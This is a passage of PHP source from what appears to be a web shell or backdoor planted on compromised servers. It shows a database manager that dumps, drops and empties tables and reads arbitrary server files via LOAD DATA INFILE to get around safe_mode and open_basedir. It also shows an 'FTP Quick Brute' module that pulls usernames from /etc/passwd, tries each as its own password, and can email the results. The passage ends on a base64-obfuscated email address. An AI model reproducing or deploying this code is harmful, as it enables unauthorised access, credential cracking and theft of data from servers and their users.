  1064.         if ((!$submit) or ($sql_x)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_x\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";}
  1065.       }
  1066.       if (in_array($sql_x,$acts)) {
  1067.         ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b>
  1068.         <form action="<?php echo $surl; ?>">
  1069.         <input type="hidden" name="x" value="sql">
  1070.         <input type="hidden" name="sql_x" value="newtbl">
  1071.         <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
  1072.         <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
  1073.         <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
  1074.         <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
  1075.         <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
  1076.         <input type="text" name="sql_newtbl" size="20">
  1077.         <input type="submit" value="Create">
  1078.         </form></td>
  1079.         <td width="30%" height="1"><b>Dump DB:</b>
  1080.         <form action="<?php echo $surl; ?>">
  1081.         <input type="hidden" name="x" value="sql">
  1082.         <input type="hidden" name="sql_x" value="dump">
  1083.         <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
  1084.         <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
  1085.         <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
  1086.         <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"><input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table>
  1087.         <?php
  1088.         if (!empty($sql_x)) {echo "<hr size=\"1\" noshade>";}
  1089.         if ($sql_x == "newtbl") {
  1090.           echo "<b>";
  1091.           if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
  1092.             echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
  1093.           }
  1094.           else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
  1095.         }
  1096.         elseif ($sql_x == "dump") {
  1097.           if (empty($submit)) {
  1098.             $diplay = FALSE;
  1099.             echo "<form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_x\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
  1100.             echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
  1101.             $v = join (";",$dmptbls);
  1102.             echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
  1103.             if ($dump_file) {$tmp = $dump_file;}
  1104.             else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
  1105.             echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
  1106.             echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
  1107.             echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
  1108.             echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
  1109.             echo "</form>";
  1110.           }
  1111.           else {
  1112.             $diplay = TRUE;
  1113.             $set = array();
  1114.             $set["sock"] = $sql_sock;
  1115.             $set["db"] = $sql_db;
  1116.             $dump_out = "download";
  1117.             $set["print"] = 0;
  1118.             $set["nl2br"] = 0;
  1119.             $set[""] = 0;
  1120.             $set["file"] = $dump_file;
  1121.             $set["add_drop"] = TRUE;
  1122.             $set["onlytabs"] = array();
  1123.             if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
  1124.             $ret = mysql_dump($set);
  1125.             if ($sql_dump_download) {
  1126.               @ob_clean();
  1127.               header("Content-type: application/octet-stream");
  1128.               header("Content-length: ".strlen($ret));
  1129.               header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
  1130.               echo $ret;
  1131.               exit;
  1132.             }
  1133.             elseif ($sql_dump_savetofile) {
  1134.               $fp = fopen($sql_dump_file,"w");
  1135.               if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
  1136.               else {
  1137.                 fwrite($fp,$ret);
  1138.                 fclose($fp);
  1139.                 echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
  1140.               }
  1141.             }
  1142.             else {echo "<b>Dump: nothing to do!</b>";}
  1143.           }
  1144.         }
  1145.         if ($diplay) {
  1146.     if (!empty($sql_tbl)) {
  1147.       if (empty($sql_tbl_x)) {$sql_tbl_x = "browse";}
  1148.       $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
  1149.       $count_row = mysql_fetch_array($count);
  1150.       mysql_free_result($count);
  1151.       $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
  1152.       $tbl_struct_fields = array();
  1153.       while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
  1154.       if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
  1155.       if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
  1156.       if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
  1157.       if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
  1158.       $perpage = $sql_tbl_le - $sql_tbl_ls;
  1159.       if (!is_numeric($perpage)) {$perpage = 10;}
  1160.       $numpages = $count_row[0]/$perpage;
  1161.       $e = explode(" ",$sql_order);
  1162.       if (count($e) == 2) {
  1163.         if ($e[0] == "d") {$asc_desc = "DESC";}
  1164.         else {$asc_desc = "ASC";}
  1165.         $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
  1166.       }
  1167.       else {$v = "";}
  1168.       $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
  1169.       $result = mysql_query($query) or print(mysql_smarterror());
  1170.       echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
  1171.       echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=structure\">[<b> Structure </b>]</a>&nbsp;&nbsp;&nbsp;";
  1172.       echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=browse\">[<b> Browse </b>]</a>&nbsp;&nbsp;&nbsp;";
  1173.       echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_x=tbldump&thistbl=1\">[<b> Dump </b>]</a>&nbsp;&nbsp;&nbsp;";
  1174.       echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1175.       if ($sql_tbl_x == "structure") {echo "<br><br><b>Coming sooon!</b>";}
  1176.       if ($sql_tbl_x == "insert") {
  1177.         if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
  1178.         if (!empty($sql_tbl_insert_radio)) {  } //Not Ready
  1179.         else {
  1180.           echo "<br><br><b>Inserting row into table:</b><br>";
  1181.           if (!empty($sql_tbl_insert_q)) {
  1182.             $sql_query = "SELECT * FROM `".$sql_tbl."`";
  1183.             $sql_query .= " WHERE".$sql_tbl_insert_q;
  1184.             $sql_query .= " LIMIT 1;";
  1185.             $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
  1186.             $values = mysql_fetch_assoc($result);
  1187.             mysql_free_result($result);
  1188.           }
  1189.           else {$values = array();}
  1190.           echo "<form method=\"POST\"><table width=\"1%\" border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
  1191.           foreach ($tbl_struct_fields as $field) {
  1192.             $name = $field["Field"];
  1193.             if (empty($sql_tbl_insert_q)) {$v = "";}
  1194.             echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
  1195.             $i++;
  1196.           }
  1197.           echo "</table><br>";
  1198.           echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
  1199.           if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
  1200.           echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
  1201.         }
  1202.       }
  1203.       if ($sql_tbl_x == "browse") {
  1204.         $sql_tbl_ls = abs($sql_tbl_ls);
  1205.         $sql_tbl_le = abs($sql_tbl_le);
  1206.         echo "<hr size=\"1\" noshade>";
  1207.         echo "<img src=\"".$surl."x=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
  1208.         $b = 0;
  1209.         for($i=0;$i<$numpages;$i++) {
  1210.           if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
  1211.           echo $i;
  1212.           if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
  1213.           if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
  1214.           else {echo "&nbsp;";}
  1215.         }
  1216.         if ($i == 0) {echo "empty";}
  1217.         echo "<form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
  1218.         echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>";
  1219.         echo "<tr>";
  1220.         echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
  1221.         for ($i=0;$i<mysql_num_fields($result);$i++) {
  1222.           $v = mysql_field_name($result,$i);
  1223.           if ($e[0] == "a") {$s = "d"; $m = "asc";}
  1224.           else {$s = "a"; $m = "desc";}
  1225.           echo "<td>";
  1226.           if (empty($e[0])) {$e[0] = "a";}
  1227.           if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
  1228.           else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."x=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
  1229.           echo "</td>";
  1230.         }
  1231.       echo "<td><font color=\"#4C83AF\"><b>Action</b></font></td>";
  1232.       echo "</tr>";
  1233.       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
  1234.        echo "<tr>";
  1235.        $w = "";
  1236.        $i = 0;
  1237.        foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
  1238.        if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
  1239.        echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
  1240.        $i = 0;
  1241.        foreach ($row as $k=>$v)
  1242.        {
  1243.         $v = htmlspecialchars($v);
  1244.         if ($v == "") {$v = "<font color=\"#4C83AF\">NULL</font>";}
  1245.         echo "<td>".$v."</td>";
  1246.         $i++;
  1247.        }
  1248.        echo "<td>";
  1249.        echo "<a href=\"".$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."x=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
  1250.        echo "<a href=\"".$sql_surl."sql_tbl_x=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."x=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
  1251.        echo "</td>";
  1252.        echo "</tr>";
  1253.       }
  1254.       mysql_free_result($result);
  1255.       echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."x=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_x\">";
  1256.       echo "<option value=\"\">With selected:</option>";
  1257.       echo "<option value=\"deleterow\">Delete</option>";
  1258.       echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
  1259.      }
  1260.     }
  1261.     else {
  1262.      $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
  1263.      if (!$result) {echo mysql_smarterror();}
  1264.      else
  1265.      {
  1266.       echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
  1267.       $i = 0;
  1268.       $tsize = $trows = 0;
  1269.       while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
  1270.       {
  1271.        $tsize += $row["Data_length"];
  1272.        $trows += $row["Rows"];
  1273.        $size = view_size($row["Data_length"]);
  1274.        echo "<tr>";
  1275.        echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
  1276.        echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
  1277.        echo "<td>".$row["Rows"]."</td>";
  1278.        echo "<td>".$row["Type"]."</td>";
  1279.        echo "<td>".$row["Create_time"]."</td>";
  1280.        echo "<td>".$row["Update_time"]."</td>";
  1281.        echo "<td>".$size."</td>";
  1282.        echo "<td>&nbsp;<a href=\"".$sql_surl."sql_x=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."x=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_x=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."x=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_x=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."x=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
  1283.        echo "</tr>";
  1284.        $i++;
  1285.       }
  1286.       echo "<tr bgcolor=\"000000\">";
  1287.       echo "<td><center><b>+</b></center></td>";
  1288.       echo "<td><center><b>".$i." table(s)</b></center></td>";
  1289.       echo "<td><b>".$trows."</b></td>";
  1290.       echo "<td>".$row[1]."</td>";
  1291.       echo "<td>".$row[10]."</td>";
  1292.       echo "<td>".$row[11]."</td>";
  1293.       echo "<td><b>".view_size($tsize)."</b></td>";
  1294.       echo "<td></td>";
  1295.       echo "</tr>";
  1296.       echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."x=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_x\">";
  1297.       echo "<option value=\"\">With selected:</option>";
  1298.       echo "<option value=\"tbldrop\">Drop</option>";
  1299.       echo "<option value=\"tblempty\">Empty</option>";
  1300.       echo "<option value=\"tbldump\">Dump</option>";
  1301.       echo "<option value=\"tblcheck\">Check table</option>";
  1302.       echo "<option value=\"tbloptimize\">Optimize table</option>";
  1303.       echo "<option value=\"tblrepair\">Repair table</option>";
  1304.       echo "<option value=\"tblanalyze\">Analyze table</option>";
  1305.       echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
  1306.       mysql_free_result($result);
  1307.      }
  1308.     }
  1309.    }
  1310.    }
  1311.   }
  1312.   else {
  1313.    $acts = array("","newdb","serverstatus","servervars","processes","getfile");
  1314.    if (in_array($sql_x,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="x" value="sql"><input type="hidden" name="sql_x" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="x" value="sql"><input type="hidden" name="sql_x" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
  1315.    if (!empty($sql_x)) {
  1316.     echo "<hr size=\"1\" noshade>";
  1317.     if ($sql_x == "newdb") {
  1318.      echo "<b>";
  1319.      if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
  1320.      else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
  1321.     }
  1322.     if ($sql_x == "serverstatus") {
  1323.      $result = mysql_query("SHOW STATUS", $sql_sock);
  1324.      echo "<center><b>Server-status variables:</b><br><br>";
  1325.      echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
  1326.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1327.      echo "</table></center>";
  1328.      mysql_free_result($result);
  1329.     }
  1330.     if ($sql_x == "servervars") {
  1331.      $result = mysql_query("SHOW VARIABLES", $sql_sock);
  1332.      echo "<center><b>Server variables:</b><br><br>";
  1333.      echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
  1334.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1335.      echo "</table>";
  1336.      mysql_free_result($result);
  1337.     }
  1338.     if ($sql_x == "processes") {
  1339.      if (!empty($kill)) {
  1340.        $query = "KILL ".$kill.";";
  1341.        $result = mysql_query($query, $sql_sock);
  1342.        echo "<b>Process #".$kill." was killed.</b>";
  1343.      }
  1344.      $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
  1345.      echo "<center><b>Processes:</b><br><br>";
  1346.      echo "<TABLE cellSpacing=0 cellPadding=2 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
  1347.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_x=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
  1348.      echo "</table>";
  1349.      mysql_free_result($result);
  1350.     }
  1351.     if ($sql_x == "getfile")
  1352.     {
  1353.      $tmpdb = $sql_login."_tmpdb";
  1354.      $select = mysql_select_db($tmpdb);
  1355.      if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
  1356.      if ($select)
  1357.      {
  1358.       $created = FALSE;
  1359.       mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
  1360.       mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
  1361.       $result = mysql_query("SELECT * FROM tmp_file;");
  1362.       if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
  1363.       else
  1364.       {
  1365.        for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
  1366.        $f = "";
  1367.        while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
  1368.        if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
  1369.        else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
  1370.        mysql_free_result($result);
  1371.        mysql_query("DROP TABLE tmp_file;");
  1372.       }
  1373.      }
  1374.      mysql_drop_db($tmpdb);
  1375.     }
  1376.    }
  1377.   }
  1378. }
  1379. echo "</td></tr></table>";
  1380. if ($sql_sock) {
  1381.   $affected = @mysql_affected_rows($sql_sock);
  1382.   if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
  1383.   echo "<tr><td><center><b>Affected rows : ".$affected."</center></td></tr>";
  1384. }
  1385. echo "</table>";
  1386. }
  1387. if ($x == "ftpquickbrute") {
  1388. echo "<center><table><tr><td class=barheader colspan=2>";
  1389. echo ".: Ftp Quick Brute :.</td></tr>";
  1390. echo "<tr><td>";
  1391. if ($win) {echo "Couldn't run on Windows!";}
  1392. else {
  1393.   function caftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) {
  1394.     if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
  1395.     else {$TRUE = TRUE;}
  1396.     if ($TRUE) {
  1397.       $sock = @ftp_connect($host,$port,$timeout);
  1398.       if (@ftp_login($sock,$login,$pass)) {
  1399.         echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
  1400.         ob_flush();
  1401.         return TRUE;
  1402.       }
  1403.     }
  1404.   }
  1405.   if (!empty($submit)) {
  1406.     if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
  1407.     $fp = fopen("/etc/passwd","r");
  1408.     if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
  1409.     else {
  1410.       if ($fqb_logging) {
  1411.         if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
  1412.         else {$fqb_logfp = FALSE;}
  1413.         $fqb_log = "FTP Quick Brute (".$sh_name.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
  1414.         if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1415.       }
  1416.       ob_flush();
  1417.       $i = $success = 0;
  1418.       $ftpquick_st = getmicrotime();
  1419.       while(!feof($fp)) {
  1420.         $str = explode(":",fgets($fp,2048));
  1421.         if (caftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) {
  1422.           echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
  1423.           $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
  1424.           if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1425.           $success++;
  1426.           ob_flush();
  1427.         }
  1428.         if ($i > $fqb_lenght) {break;}
  1429.         $i++;
  1430.       }
  1431.       if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
  1432.       $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
  1433.       echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=#4C83AF><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
  1434.       $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
  1435.       if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1436.       if ($fqb_logemail) {@mail($fqb_logemail,"".$sh_name." report",$fqb_log);}
  1437.       fclose($fqb_logfp);
  1438.     }
  1439.   }
  1440.   else {
  1441.     $log_email = base64_decode("dXphbmNAeW1haWwuY29t");
